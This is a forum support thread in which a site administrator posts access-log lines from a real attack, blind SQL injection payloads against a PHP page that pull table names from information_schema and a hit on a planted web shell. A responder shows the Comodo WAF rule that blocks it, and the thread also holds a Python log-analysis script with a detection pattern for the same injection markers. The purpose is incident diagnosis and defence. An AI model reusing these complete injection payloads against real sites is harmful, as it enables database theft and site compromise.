VERY SERIOUS VULNERABILITY THAT WAS NOT STOPPED

Last night a hacker infected a shell file, using SQL injection, and COMODO Firewall didn’t stop the attack.

The Logs:

5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3028--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%268--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%26128--+ HTTP/1.1" 200 10531 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2632--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3029--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%26128--+ HTTP/1.1" 200 10531 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2632--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3030--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%268--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
---> and here is the shell
5.249.87.35 - - [27/Feb/2015:00:58:06 +0000] "GET /imagens/topos/rc.php HTTP/1.1" 200 43661 "http://www.aoficina.pt/backoffice/bannerstopo/editar.php?id=13&ordem=id&pag=1&limit=100&pag_actual=listar.php&s=&ord=0" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36"

I have taken the first request from your log and tried to reproduce it. Here is what I got:

Message: Access denied with code 403 (phase 2). Pattern match "(?i:\\b(?:t(?:able_name\\b|extpos[^a-zA-Z0-9_]{1,}\\()|(?:a(?:ll_objects|tt(?:rel|typ)id)|column_(?:id|name)|mb_users|object_(?:id|(?:nam|typ)e)|pg_(?:attribute|class)|rownum|s(?:ubstr(?:ing){0,1}|ys(?:c(?:at|o(?:lumn|nstraint)s)|dba|ibm|(?:filegroup|o ..." at ARGS:id. [file "/usr/local/CWAF/rules/cwaf_02.conf"] [line "299"] [id "211540"] [msg "COMODO WAF: Blind SQL Injection Attack"] [data "Matched Data: substring found within ARGS:id: 1 and ascii(substring((select concat(0x53514c69,mid((select concat(group_concat(0x6868,hex(cast(r as char)),0x6a6a,hex(cast(ifnull(q,0x30) as char)),0x6868 order by r separator 0x6767),0x69)from(select TABLE_NAME r,table_rows q from information_schema.tables where TABLE_SCHEMA=0x6964365f6264 order by r)x),24,65536))),3028,1))&64--"] [severity "CRITICAL"]

As you can see, rule id “211540” has blocked this attack. But in your case I see response code 200. So make sure you haven’t disabled this rule.
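The two posts above make one point: the payloads are boolean-based blind SQL injection (one byte read with `ascii(substring(...))` and tested against a bit mask, the length probed with `char_length(...)`), and the WAF rule fires only if ModSecurity is actually enabled, which is why a status of 200 instead of 403 on those requests is the tell-tale. The following is an added example, not code from the thread or from Comodo: it parses Apache combined-format access log lines, flags requests carrying those markers, and reports per client whether they were blocked (403) or reached the application. The sample lines are constructed (TEST-NET addresses, shortened payloads) and only mimic the thread's log.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format (the format the thread's log lines are in).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Markers of the blind SQLi seen in the thread: a byte read via ascii(substring(...)),
# the length probed via char_length(...), and table names pulled from information_schema.
BLIND_SQLI_RE = re.compile(
    r'ascii\s*\(\s*substring\s*\(|char_length\s*\(|information_schema\.', re.I)


def parse_line(line):
    """Split one access-log line into fields; return None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode %26 -> '&' and '+' -> ' ' so the signatures match the real query string.
    rec["query"] = unquote_plus(rec["path"].partition("?")[2])
    return rec


def analyse(lines):
    """Per client IP: injection-looking requests the WAF blocked (403) versus
    let through to the application (any other status, e.g. 200)."""
    report = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not BLIND_SQLI_RE.search(rec["query"]):
            continue
        entry = report.setdefault(rec["ip"], {"blocked": 0, "passed": 0})
        entry["blocked" if rec["status"] == 403 else "passed"] += 1
    return report


def waf_gaps(report):
    """IPs whose attempts reached the application: the rule is disabled or bypassed."""
    return sorted(ip for ip, e in report.items() if e["passed"] > 0)


# Constructed sample lines modelled on the thread's log (addresses from TEST-NET ranges).
SAMPLE = [
    '203.0.113.5 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+table_name+from+information_schema.tables),1,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"',
    '203.0.113.5 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+char_length((select+table_name+from+information_schema.tables))>3028--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"',
    '198.51.100.7 - - [27/Feb/2015:01:02:11 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+table_name+from+information_schema.tables),1,1))%261--+ HTTP/1.1" 403 199 "-" "Java/1.8.0_25"',
    '192.0.2.9 - - [27/Feb/2015:01:05:00 +0000] "GET /conteudos.php?id=13 HTTP/1.1" 200 8831 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    report = analyse(SAMPLE)
    for ip, counts in report.items():
        print(ip, counts)
    print("WAF gaps:", waf_gaps(report))  # -> ['203.0.113.5']
```

On a real server, feed it the access log and alert whenever `waf_gaps` is non-empty: that condition is exactly the "200 where a 403 was expected" the reply above describes.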

TDmitry, absolutely right, the client turned off modsecurity in his cPanel. I didn’t disable the “modsecurity” button in cPanel on this server, and he turned the thing off.

Your help was very precious. Thank you very much.